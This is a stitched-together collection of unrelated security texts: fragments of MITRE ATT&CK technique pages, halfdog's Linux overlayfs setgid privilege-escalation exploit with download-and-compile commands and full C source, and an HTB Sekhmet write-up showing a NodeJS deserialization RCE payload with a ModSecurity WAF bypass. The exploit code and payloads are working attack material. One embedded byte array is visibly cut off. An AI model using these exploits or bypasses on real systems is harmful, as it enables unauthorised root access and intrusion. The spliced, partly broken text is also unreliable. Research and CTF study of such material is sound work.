remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[99] G Saint Bear Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.[85][100] S Saint Bot Saint Bot has relied on users to click on a malicious link delivered via a spearphishing.[85] G Sandworm Team Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.[101] G Sidewinder Sidewinder has lured targets to click on malicious links to gain execution in the target environment.[102][103][104][105] S SMOKEDHAM SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.[106] S Snip Snip3 has been executed through luring victims into clicking malicious links.[107] S SocGholish SocGholish has lured victims into interacting with malicious links on compromised websites for execution.[72] S SpicyOmelette SpicyOmelette has been executed through malicious links within spearphishing emails.[26] S Squirrelwaffle Squirrelwaffle has relied on victims to click on a malicious link send via phishing campaigns.[108] G TA TA2541 has used malicious links to cloud and web services to gain execution on victim machines.[109][73] G TA TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. [110][111][112][113][114][115][116][117] G TA TA577 has lured users into executing malicious JavaScript files by sending malicious links via email.[52] G TA TA578 has placed malicious links in contact forms on victim sites, often spoofing a copyright complaint, to redirect users to malicious file downloads.[52] G Transparent Tribe Transparent Tribe has directed users to open URLs hosting malicious content.[75][76] S TSCookie TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.[118] G
versions_v17_techniques_T1204_001.txt
Source: http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ ## Introduction ### Problem description: Linux user namespace allows to mount file systems as normal user, including the overlayfs. As many of those features were not designed with namespaces in mind, this increase the attack surface of the Linux kernel interface. Overlayfs was intended to allow create writeable filesystems when running on readonly medias, e.g. on a live-CD. In such scenario, the lower filesystem contains the read-only data from the medium, the upper filesystem part is mixed with the lower part. This mixture is then presented as an overlayfs at a given mount point. When writing to this overlayfs, the write will only modify the data in upper, which may reside on a tmpfs for that purpose. Due to inheritance of Posix ACL information (xattrs) when copying up overlayfs files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/). On standard Ubuntu system, this allows to gain access to groups staff, mail, libuuid. ## Methods ### Target Selection: Suitable target directories can be easily found using find / -perm -02020 2> /dev/null. On standard Ubuntu system those are: /usr/local/lib/python3.4 (root.staff) /var/lib/libuuid (libuuid.libuuid) /var/local (root.staff) /var/mail (root.mail) ### Exploitation: Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/) exploit. The following steps include command variants needed for different operating systems. They have to be executed in two processes, one inside the user namespace, the other one outside of it. ### Inside: test$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c http://www.halfdog.net/Misc/Utils/SuidExec.c test$ gcc -o CreateSetgidBinary CreateSetgidBinary.c test$ gcc -o UserNamespaceExec UserNamespaceExec.c test$ gcc -o SuidExec SuidExec.c test$ ./UserNamespaceExec -- /bin/bash root# mkdir mnt test work root# mount -t overlayfs -o lowerdir=[parent of targetdir],upperdir=test overlayfs mnt # Ubuntu Trusty root# mount -t overlayfs -o lowerdir=[parent of targetdir],upperdir=test,workdir=work overlayfs mnt # Ubuntu Wily ### Outside: test$ setfacl -m d:u:test:rwx test # Ubuntu Trusty test$ setfacl -m d:u::rwx,d:u:test:rwx work/work # Ubuntu Wily ### Inside: root# chmod 02777 mnt/[targetdir] root# umount mnt ### Outside: test$ ./CreateSetgidBinary test/[targetdir]/escalate /bin/mount x nonexistent-arg test$ test/[targetdir]/escalate ./SuidExec /bin/bash test$ touch x test$ ls -al x -rw-r--r-- 1 test [targetgroup] 0 Jan 16 20:39 x --- CreateSetgidBinary.c --- /** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or otherwise, arising in any way out of the use of this software, * even if advised of the possibility of such damage. * * This tool allows to create a setgid binary in appropriate directory * to escalate to the group of this directory. * * Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c * * Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args] * * Example: * * # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg * # ls -al ./escalate * # ./escalate /bin/sh * * Copyright (c) 2015-2017 halfdog <me (%) halfdog.net> * License: https://www.gnu.org/licenses/lgpl-3.0.en.html * * See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information. */ #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <sys/resource.h> #include <unistd.h> #include <sys/wait.h> int main(int argc, char **argv) { // No slashes allowed, everything else is OK. char suidExecMinimalElf[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00, 0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00, 0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08, 0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8, 0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0, 0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x }; int destFd=open(argv[1], O_RDWR|O_CREAT, 07777); if(destFd<0) { fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno)); return(1); } char *suidWriteNext=suidExecMinimalElf; char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf); while(suidWriteNext!=suidWriteEnd) { char *suidWriteTestPos=suidWriteNext; while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd)) suidWriteTestPos++; // We cannot write any 0-bytes. So let seek fill up the file wihh // null-bytes for us. lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET); suidWriteNext=suidWriteTestPos; while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd)) suidWriteTestPos++; int result=fork(); if(!result) { struct rlimit limits; // We can't truncate, that would remove the setgid property of // the file. So make sure the SUID binary does not write too much. limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf; limits.rlim_max=limits.rlim_cur; setrlimit(RLIMIT_FSIZE, &limits); // Do not rely on some SUID binary to print out the unmodified // program name, some OSes might have hardening against that. // Let the ld-loader will do that for us. limits.rlim_cur=1<<22; limits.rlim_max=limits.rlim_cur; result=setrlimit(RLIMIT_AS, &limits); dup2(destFd, 1); dup2(destFd, 2); argv[3]=suidWriteNext; execve(argv[2], argv+3, NULL); fprintf(stderr, "Exec failed\n"); return(1); } waitpid(result, NULL, 0); suidWriteNext=suidWriteTestPos; // ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf); } fprintf(stderr, "Completed\n"); return(0); } --- EOF --- --- UserNamespaceExec.c --- /** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or otherwise, arising in any way out of the use of this software, * even if advised of the possibility of such damage. * * Copyright (c) 2015-2016 halfdog <me (%) halfdog.net> * See http://www.halfdog.net/Misc/Utils/ for more information. * * This tool creates a new namespace, initialize the uid/gid * map and execute the program given as argument. This is similar * to unshare(1) from newer util-linux packages. * * gcc -o UserNamespaceExec UserNamespaceExec.c * * Usage: UserNamespaceExec [options] -- [program] [args] * * * --NoSetGroups: do not disable group chanages * * --NoSetGidMap: * * --NoSetUidMap: */ #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/wait.h> #include <unistd.h> extern char **environ; static int childFunc(void *arg) { int parentPid=getppid(); fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid()); while((geteuid()!=0)&&(parentPid==getppid())) { sleep(1); } fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid()); int result=execve(((char**)arg)[0], (char**)arg, environ); fprintf(stderr, "Exec failed\n"); return(1); } #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; int main(int argc, char *argv[]) { int argPos; int noSetGroupsFlag=0; int setGidMapFlag=1; int setUidMapFlag=1; int result; for(argPos=1; argPos<argc; argPos++) { char *argName=argv[argPos]; if(!strcmp(argName, "--")) { argPos++; break; } if(strncmp(argName, "--", 2)) { break; } if(!strcmp(argName, "--NoSetGidMap")) { setGidMapFlag=0; continue; } if(!strcmp(argName, "--NoSetGroups")) { noSetGroupsFlag=1; continue; } if(!strcmp(argName, "--NoSetUidMap")) { setUidMapFlag=0; continue; } fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName); exit(1); } // Create child; child commences execution in childFunc() // CLONE_NEWNS: new mount namespace // CLONE_NEWPID // CLONE_NEWUTS pid_t pid=clone(childFunc, child_stack+STACK_SIZE, CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos); if(pid==-1) { fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno)); return(1); } char idMapFileName[128]; char idMapData[128]; if(!noSetGroupsFlag) { sprintf(idMapFileName, "/proc/%d/setgroups", pid); int setGroupsFd=open(idMapFileName, O_WRONLY); if(setGroupsFd<0) { fprintf(stderr, "Failed to open setgroups\n"); return(1); } result=write(setGroupsFd, "deny", 4); if(result<0) { fprintf(stderr, "Failed to disable setgroups\n"); return(1); } close(setGroupsFd); } if(setUidMapFlag) { sprintf(idMapFileName, "/proc/%d/uid_map", pid); fprintf(stderr, "Setting uid map in %s\n", idMapFileName); int uidMapFd=open(idMapFileName, O_WRONLY); if(uidMapFd<0) { fprintf(stderr, "Failed to open uid map\n"); return(1); } sprintf(idMapData, "0 %d 1\n", getuid()); result=write(uidMapFd, idMapData, strlen(idMapData)); if(result<0) { fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno)); return(1); } close(uidMapFd); } if(setGidMapFlag) { sprintf(idMapFileName, "/proc/%d/gid_map", pid); fprintf(stderr, "Setting gid map in %s\n", idMapFileName); int gidMapFd=open(idMapFileName, O_WRONLY); if(gidMapFd<0) { fprintf(stderr, "Failed to open gid map\n"); return(1); } sprintf(idMapData, "0 %d 1\n", getgid()); result=write(gidMapFd, idMapData, strlen(idMapData)); if(result<0) { if(noSetGroupsFlag) { fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno)); } else { fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno)); return(1); } } close(gidMapFd); } if(waitpid(pid, NULL, 0)==-1) { fprintf(stderr, "Wait failed\n"); return(1); } return(0); } --- EOF --- --- SuidExec.c--- /** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or
41762.txt
HTB: Sekhmet hackthebox htb-sekhmet ctf nmap ffuf subdomain nodejs express feroxbuster deserialization json-deserialization modsecurity waf filter bypass sssd kerberos zipcrypto bkcrack known-plaintext crypto hashcat kinit klist ksu tunnel smbclient proxychains command-injection watch tmux ldapsearch ldap password-spray kerbrute winrm evil-winrm dpapi mimikatz pypykatz edge-saved-passwords applocker applocker-bypass sharp-chromium sharp-collection htb-hathor htb-anubis htb-celestial htb-nodeblog htb-ransom htb-access osep-like cpts-like Apr 1, HTB: Sekhmet Sekhmet has Windows and Linux exploitation, and a lot of Kerberos. I’ll start exploiting a ExpressJS website vulnable to a JSON deserialization attack. To get execution, I’ll have to bypass a ModSecurity web application firewall. This lands me in a Linux VM. In the VM, I’ll find a backup archive and break the encryption using a known plaintext attack on ZipCrypto to get another user’s domain hash. On cracking that, I’m able to get root on the VM. As the domain user, I’ll access a share, and figure that there’s a text file being updated based on the mobile attribute for four users in the AD environment. There’s a command injection in the script that’s updating, and I’ll use that to get a hash for the user running the script. After password spraying that password to find another user, I’ll get access to the host and find DPAPI protected creds in the user’s Edge instance. On cracking those, I get domain admin credentials. Box Info Name Sekhmet Play on HackTheBox Release Date 10 Sep Retire Date 01 Apr OS Windows Base Points Insane [50] Rated Difficulty Radar Graph 04:31:28 jazzpizazz 21:37:04 jazzpizazz Creator 4ndr34z Recon nmap nmap finds two open TCP ports, SSH (22) and HTTP (80): oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11. Starting Nmap 7.80 ( https://nmap.org ) at 2023-03-24 16:47 EDT Nmap scan report for 10.10.11. Host is up (0.086s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11. Starting Nmap 7.80 ( https://nmap.org ) at 2023-03-28 12:35 EDT Nmap scan report for 10.10.11. Host is up (0.087s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18. |_http-server-header: nginx/1.18. |_http-title: 403 Forbidden Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds Based on the OpenSSH version, the host is likely running Debian 11 bullseye. This is interesting given that HTB shows Sekhmet as a Windows box. Probably VM or container. Subdomain Brute Force Visiting the site returns a redirect to www.windcorp.htb. Given the use of domains, I’ll use ffuf to fuzz for any other subdomains that respond differently. I use -ac to filter automatically, and -mc all to make sure I get any HTTP response codes: oxdf@hacky$ ffuf -u http://10.10.11.179 -H "Host: FUZZ.windcorp.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -mc all /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0. ________________________________________________ :: Method : GET :: URL : http://10.10.11. :: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt :: Header : Host: FUZZ.windcorp.htb :: Follow redirects : false :: Calibration : true :: Timeout : :: Threads : :: Matcher : Response status: all ________________________________________________ [Status: 403, Size: 2436, Words: 234, Lines: 44, Duration: 110ms] * FUZZ: portal :: Progress: [19966/19966] :: Job [1/1] :: 278 req/sec :: Duration: [0:01:01] :: Errors: 0 :: It finds portal.windcorp.htb immediately. I’ll update my /etc/hosts file to include: 10.10.11.179 www.windcorp.htb windcorp.htb portal.windcorp.htb I’ll also make sure to comment out any lines from Hathor and Anubis, both of which used windcorp.htb. www.windcorp.htb - TCP Site The site is for a website creation / graphic design company: Click for full image There’s an email address right at the top, contact@windcorp.htb. There are some names of employees, but nothing that looks like a username. Tech Stack The HTTP headers show NGINX, but not much else: HTTP/1.1 200 OK Server: nginx/1.18. Date: Tue, 28 Mar 2023 16:41:41 GMT Content-Type: text/html Last-Modified: Thu, 18 Aug 2022 15:09:09 GMT Connection: close ETag: W/"62fe5615-8664" Content-Length: The 404 page is the default NGINX 404: This could be just NGINX hosting a static site. Directory Brute Force I’ll run feroxbuster against the site: oxdf@hacky$ feroxbuster -u http://www.windcorp.htb ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.9. ───────────────────────────┬────────────────────── 🎯 Target Url │ http://www.windcorp.htb 🚀 Threads │ 📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-small-words.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 🦡 User-Agent │ feroxbuster/2.9. 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 7l -w 153c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 7l 9w 153c http://www.windcorp.htb/.inc 301 GET 7l 11w 169c http://www.windcorp.htb/assets => http://www.windcorp.htb/assets/ 200 GET 112l 805w 65527c http://www.windcorp.htb/assets/img/team/team-3.jpg 200 GET 13l 164w 15563c http://www.windcorp.htb/assets/vendor/swiper/swiper-bundle.min.css 403 GET 7l 9w 153c http://www.windcorp.htb/.axd 200 GET 359l 1883w 179493c http://www.windcorp.htb/assets/img/about-list-img.jpg 200 GET 747l 2343w 34404c http://www.windcorp.htb/ 200 GET 1l 133w 63781c http://www.windcorp.htb/assets/vendor/boxicons/css/boxicons.min.css 301 GET 7l 11w 169c http://www.windcorp.htb/assets/css => http://www.windcorp.htb/assets/css/ 301 GET 7l 11w 169c http://www.windcorp.htb/assets/js => http://www.windcorp.htb/assets/js/ 403 GET 7l 9w 153c http://www.windcorp.htb/assets/img/ ...[snip]... It returns a lot! I’ll let it run in the background, but it also makes the site really slow, so I’ll eventually conclude that there’s nothing really interesting here and kill it. A bunch of the identified information is 403s on files in /assets, which isn’t interesting. portal.windcorp.htb - TCP Site The site presents a login page: While just trying creds to see what the request looks like, I tried admin / admin and it worked! The next page doesn’t offer much: The “About” link goes to /about but nothing interesting: Tech Stack The HTTP response headers on portal show that it’s Express: HTTP/1.1 200 OK Server: nginx/1.18. Date: Tue, 28 Mar 2023 17:17:53 GMT Content-Type: text/html; charset=utf- Connection: close X-Powered-By: Express ETag: W/"42a-ceoj/qzu7pE8a4/5MOc2Roj9g0U" Content-Length: Visiting any url path on this host seems to return the login page as a 200 OK (no redirect). That’s a bit odd, and will make brute forcing paths with something like feroxbuster a bit odd (I turn out not to need this). When I log in, the response sets a cookie: HTTP/1.1 302 Found Server: nginx/1.18. Date: Tue, 28 Mar 2023 17:19:37 GMT Content-Type: text/html; charset=utf- Content-Length: Connection: close X-Powered-By: Express Set-Cookie: profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODAwMjM5Nzc1NzF9; Max-Age=604800; HttpOnly Location: / Vary: Accept Shell as webster on webserver Cookie Analysis The cookie is base64 data: oxdf@hacky$ echo "eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODAwMjM5Nzc1NzF9" | base64 -d {"username":"admin","admin":"1","logon":1680023977571} I can edit the cookie to change the username or admin status, but there’s not much point, as I’m already admin with admin true. Deserialization Attack Background This post does a nice overview of how to abuse deserialization in NodeJS / Express. I’ve actually cited this exactly post twice before, in Celestial and Nodeblog. The unserialize function in NodeJS is not meant to accept user-controlled data, and can be exploited to get code execution. The post author generates this example payload: {"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }()"} Initial Attempt I’ll modify that payload to ping my server: {"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping -c 1 10.10.14.6', function(error, stdout, stderr) { console.log(stdout) });\n }()"} Base64-encoding gives this, which I’ll set as my cookie: eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7XG4gXHQgcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BpbmcgLWMgMSAxMC4xMC4xNC42JywKZnVuY3Rpb24oZXJyb3IsIHN0ZG91dCwgc3RkZXJyKSB7IGNvbnNvbGUubG9nKHN0ZG91dCkgfSk7XG4gfSgpIn0= I’ll set that as my cookie in Firefox with the dev tools, and refresh the page. I don’t get pings, and the page shows I’ve been blocked by ModSecurity: The post shows a way to encode a reverse shell as a series of int that get passed to eval(String.fromCharCode()), but this is blocked as well. WAF Enumeration I want to figure out what’s getting blocked by the web application firewall (WAF). I’ll start removing parts of the (pre-base64-encoded cookie) and sending to see where it stops returning 403 Forbidden. {"rce":"_$$ND_FUNC$$_ still returns 403 Forbidden, but {"rce":"_$$ND_FUNC$$ returns a 500 Internal Server Error. The error isn’t surprising, as the malformed cookie will crash things. Still, it isn’t being flagged by the WAF Bypass / RCE There are many ways to bypass WAFs. One thing to try is different encodings. One that works here is encoding some bytes in unicode. Replacing one of the $ with \u0024 makes: eyJyY2UiOiJfJCRORF9GVU5DJFx1MDAyNF8= This is returns a 500 error! That’s bypassing the WAF (though it’s not clear yet that the server handles it correctly). I’ll start rebuilding the cookie a bit at a time, and when I get up to this, it triggers the WAF again: {"rce":"_$$ND_FUNC$\u0024_function (){ Encoding the { as \u007b: {"rce":"_$$ND_FUNC\u0024$_function() \u007brequire('child_process').exec('ping -c 1 10.10.14.6', function(error,stdout,stderr) {console.log(stdout) });\n}()"} Encoding this and sending it doesn’t return 500, but 200, with an ICMP echo request at my listening tcpdump: oxdf@hacky$ sudo tcpdump -ni tun0 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type
2023_04_01_htb-sekhmet.html.txt
Currently viewing ATT&CK v15.1 which was live between April 23, 2024 and October 30, 2024. Learn more about the versioning system or see the live site. - Home - Techniques - Enterprise - Event Triggered Execution - Accessibility Features Event Triggered Execution: Accessibility Features Other sub-techniques of Event Triggered Execution (16) ID Name T1546. Change Default File Association T1546. Screensaver T1546. Windows Management Instrumentation Event Subscription T1546. Unix Shell Configuration Modification T1546. Trap T1546. LC_LOAD_DYLIB Addition T1546. Netsh Helper DLL T1546. Accessibility Features T1546. AppCert DLLs T1546. AppInit DLLs T1546. Application Shimming T1546. Image File Execution Options Injection T1546. PowerShell Profile T1546. Emond T1546. Component Object Model Hijacking T1546. Installer Packages Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [1] Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [2] The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. [3] Other accessibility features exist that may also be leveraged in a similar fashion: [2][4] - On-Screen Keyboard: C:\Windows\System32\osk.exe - Magnifier: C:\Windows\System32\Magnify.exe - Narrator: C:\Windows\System32\Narrator.exe - Display Switcher: C:\Windows\System32\DisplaySwitch.exe - App Switcher: C:\Windows\System32\AtBroker.exe ID: T1546. Sub-technique of: T ⓘ Tactics: Privilege Escalation, Persistence ⓘ Platforms: Windows ⓘ Permissions Required: Administrator ⓘ Effective Permissions: SYSTEM Contributors: Paul Speulstra, AECOM Global Security Operations Center Version: 1. Created: 24 January Last Modified: 21 April Version Permalink Live Version Procedure Examples ID Name Description G APT APT29 used sticky-keys to obtain unauthenticated, privileged console access.[5][6] G APT APT3 replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence.[7] G APT APT41 leveraged sticky keys to establish persistence.[8] G Axiom Axiom actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.[9] G Deep Panda Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.[10] S Empire Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.[11] G Fox Kitten Fox Kitten has used sticky keys to launch a command prompt.[12] Mitigations ID Mitigation Description M Execution Prevention Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application control [13] tools, like Windows Defender Application Control[14], AppLocker, [15] [16] or Software Restriction Policies [17] where appropriate. [18] M Limit Access to Resource Over Network If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.[19] M Operating System Configuration To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later.[20] Detection ID Data Source Data Component Detects DS Command Command Execution Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of Accessibility Features. DS File File Creation Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. File Modification Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. DS Process Process Creation Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. Several accessibility programs can be run using the Ease of Access center - sethc.exe handles StickyKeys - utilman.exe is the Ease of Access menu - osk.exe runs the On-Screen Keyboard - narrator.exe reads screen text over audio - magnify.exe magnifies the view of the screen near the cursor One simple way to implement this technique is to note that in a default Windows configuration there are no spaces in the path to the system32 folder. If the accessibility programs are ever run with a Debugger set, then Windows will launch the Debugger process and append the command line to the accessibility program. As a result, a space is inserted in the command line before the path. Looking for any instances of a space in the command line before the name of an accessibility program will help identify when Debuggers are set. The Windows Registry location HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the "Debugger" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", and "Magnify.exe" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set. Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic example looks for any creation of common accessibility processes such as sethc.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the parent process) that helps reduce false positives. Analytic 2 could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string "sethc.exe" being used as an argument for another application is unlikely, it still is a possibility. Analytic 1 - Command Launched from Winlogon (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND ParentImage="winlogon.exe" AND Image="cmd.exe"AND (CommandLine="sethc.exe"OR CommandLine="utilman.exe"OR CommandLine="osk.exe" OR CommandLine="narrator.exe" OR CommandLine="*magnify.exe" Analytic 2 - Debuggers for Accessibility Applications (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" 